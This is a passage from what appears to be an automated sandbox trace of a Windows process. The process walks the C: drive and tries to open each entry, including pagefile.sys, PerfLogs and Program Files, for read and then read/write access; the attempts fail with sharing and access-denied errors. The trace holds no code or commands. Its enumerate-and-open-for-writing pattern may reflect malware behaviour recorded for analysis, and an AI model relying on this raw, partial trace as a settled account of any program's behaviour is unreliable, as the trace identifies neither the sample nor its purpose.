(in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0073.677] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.677] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.677] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x3e, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x68d68, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x3e, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓က\x01⺊Ās\\먤聤̓㑍Ā̓蹐\x07̓뻌聤က\x01က\x01.evtx")) returned 0 [0073.677] FindClose (in: hFindFile=0x78e50 | out: hFindFile=0x78e50) returned 1 [0073.677] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0073.677] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0073.677] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0073.677] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0073.677] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x80a30 | out: hHeap=0x20000) returned 1 [0073.677] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cce0 | out: hHeap=0x20000) returned 1 [0073.677] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f5c8 | out: hHeap=0x20000) returned 1 [0073.677] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x462e8 | out: hHeap=0x20000) returned 1 [0073.677] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cce0 [0073.677] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f5c8 [0073.677] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cce0 | out: hHeap=0x20000) returned 1 [0073.677] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f5c8 | out: hHeap=0x20000) returned 1 [0073.677] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0073.677] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0073.677] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0073.677] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0073.677] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0073.677] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0073.677] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.677] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.677] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.677] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.677] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0073.677] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0073.678] AreFileApisANSI () returned 1 [0073.678] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\pagefile.sys", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\pagefile.sys", lpUsedDefaultChar=0x0) returned 16 [0073.678] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.678] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.678] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cce0 [0073.678] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0073.678] AreFileApisANSI () returned 1 [0073.678] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 16 [0073.678] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0073.678] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x88658, cchWideChar=16 | out: lpWideCharStr="C:\\pagefile.sys") returned 16 [0073.678] CreateFileW (lpFileName="C:\\pagefile.sys" (normalized: "c:\\pagefile.sys"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0073.678] GetLastError () returned 0x20 [0073.678] GetLastError () returned 0x20 [0073.678] SetLastError (dwErrCode=0x20) [0073.678] GetLastError () returned 0x20 [0073.678] SetLastError (dwErrCode=0x20) [0073.678] GetLastError () returned 0x20 [0073.678] SetLastError (dwErrCode=0x20) [0073.678] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0073.678] AreFileApisANSI () returned 1 [0073.678] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 16 [0073.678] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0073.679] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x88680, cchWideChar=16 | out: lpWideCharStr="C:\\pagefile.sys") returned 16 [0073.679] CreateFileW (lpFileName="C:\\pagefile.sys" (normalized: "c:\\pagefile.sys"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0073.679] GetLastError () returned 0x20 [0073.679] GetLastError () returned 0x20 [0073.679] SetLastError (dwErrCode=0x20) [0073.679] GetLastError () returned 0x20 [0073.679] SetLastError (dwErrCode=0x20) [0073.679] GetLastError () returned 0x20 [0073.679] SetLastError (dwErrCode=0x20) [0073.679] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0073.679] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0073.679] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cce0 | out: hHeap=0x20000) returned 1 [0073.679] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.679] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.679] FindNextFileW (in: hFindFile=0x78dd0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b3dd09, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa03748ae, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17b3dd09, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="PerfLogs", cAlternateFileName="")) returned 1 [0073.679] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0073.679] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0073.679] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0073.679] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0073.679] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0073.679] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0073.679] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0073.679] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0073.839] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0073.839] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0073.839] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0073.839] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0073.839] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0073.839] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0073.839] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0073.839] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0073.839] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0073.839] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0073.839] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.839] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.839] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.839] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.839] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0073.839] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0073.839] AreFileApisANSI () returned 1 [0073.839] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\PerfLogs", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\PerfLogs", lpUsedDefaultChar=0x0) returned 12 [0073.839] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.839] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.839] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0073.839] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0073.839] AreFileApisANSI () returned 1 [0073.839] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 12 [0073.839] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x18) returned 0x6f2c8 [0073.839] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x6f2c8, cchWideChar=12 | out: lpWideCharStr="C:\\PerfLogs") returned 12 [0073.840] CreateFileW (lpFileName="C:\\PerfLogs" (normalized: "c:\\perflogs"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0073.840] GetLastError () returned 0x5 [0073.840] GetLastError () returned 0x5 [0073.840] SetLastError (dwErrCode=0x5) [0073.840] GetLastError () returned 0x5 [0073.840] SetLastError (dwErrCode=0x5) [0073.840] GetLastError () returned 0x5 [0073.840] SetLastError (dwErrCode=0x5) [0073.840] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0073.840] AreFileApisANSI () returned 1 [0073.840] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 12 [0073.840] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x18) returned 0x6f2c8 [0073.840] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x6f2c8, cchWideChar=12 | out: lpWideCharStr="C:\\PerfLogs") returned 12 [0073.840] CreateFileW (lpFileName="C:\\PerfLogs" (normalized: "c:\\perflogs"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0073.840] GetLastError () returned 0x5 [0073.840] GetLastError () returned 0x5 [0073.840] SetLastError (dwErrCode=0x5) [0073.840] GetLastError () returned 0x5 [0073.840] SetLastError (dwErrCode=0x5) [0073.840] GetLastError () returned 0x5 [0073.840] SetLastError (dwErrCode=0x5) [0073.841] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0073.841] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0073.841] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0073.841] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.841] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.841] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.841] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.841] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0073.841] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0073.841] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0073.841] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0073.841] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0073.841] FindNextFileW (in: hFindFile=0x78dd0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x17b3dd09, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x40edfa76, ftLastAccessTime.dwHighDateTime=0x1d5d816, ftLastWriteTime.dwLowDateTime=0x40edfa76, ftLastWriteTime.dwHighDateTime=0x1d5d816, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="Program Files", cAlternateFileName="PROGRA~1")) returned 1 [0073.841] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0073.841] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0073.841] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0073.841] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0073.841] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0073.841] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0073.841] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0073.841] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0073.841] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0073.841] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0073.841] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0073.841] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0073.841] FindFirstFileExW (in: lpFileName="C:\\PerfLogs\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x784d0 [0073.842] FindNextFileW (in: hFindFile=0x784d0, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b3dd09, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa03748ae, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17b3dd09, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0073.842] FindNextFileW (in: hFindFile=0x784d0, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b3dd09, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa03748ae, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17b3dd09, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0073.842] FindClose (in: hFindFile=0x784d0 | out: hFindFile=0x784d0) returned 1 [0073.842] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0073.842] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0073.842] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x465f8 [0073.843] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0073.843] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0073.843] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0073.843] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0073.843] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0073.843] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0073.843] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0073.843] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0073.843] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0073.843] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x465f8 | out: hHeap=0x20000) returned 1 [0073.843] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0073.843] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0073.843] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0073.843] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0073.843] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0073.843] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0073.843] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0073.843] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0073.843] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0073.843] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0073.843] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.843] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.843] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.843] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.843] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0073.843] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0073.843] AreFileApisANSI () returned 1 [0073.843] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files", lpUsedDefaultChar=0x0) returned 17 [0073.843] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0073.843] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.843] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.843] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0073.843] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0073.844] AreFileApisANSI () returned 1 [0073.844] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88798, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 17 [0073.844] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x22) returned 0x7ac98 [0073.844] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88798, cbMultiByte=-1, lpWideCharStr=0x7ac98, cchWideChar=17 | out: lpWideCharStr="C:\\Program Files") returned 17 [0073.844] CreateFileW (lpFileName="C:\\Program Files" (normalized: "c:\\program files"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0073.844] GetLastError () returned 0x5 [0073.844] GetLastError () returned 0x5 [0073.844] SetLastError (dwErrCode=0x5) [0073.844] GetLastError () returned 0x5 [0073.844] SetLastError (dwErrCode=0x5) [0073.844] GetLastError () returned 0x5 [0073.844] SetLastError (dwErrCode=0x5) [0073.844] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7ac98 | out: hHeap=0x20000) returned 1 [0073.844] AreFileApisANSI () returned 1 [0073.844] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88798, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 17 [0073.844] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x22) returned 0x7aa88 [0073.844] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88798, cbMultiByte=-1, lpWideCharStr=0x7aa88, cchWideChar=17 | out: lpWideCharStr="C:\\Program Files") returned 17 [0073.844] CreateFileW (lpFileName="C:\\Program Files" (normalized: "c:\\program files"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0073.844] GetLastError () returned 0x5 [0073.844] GetLastError () returned 0x5 [0073.845] SetLastError (dwErrCode=0x5) [0073.845] GetLastError () returned 0x5 [0073.845] SetLastError (dwErrCode=0x5) [0073.845] GetLastError () returned 0x5 [0073.845] SetLastError (dwErrCode=0x5) [0073.845] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7aa88 | out: hHeap=0x20000) returned 1 [0073.845] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0073.845] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0073.845] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0073.845] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.845] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.845] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, 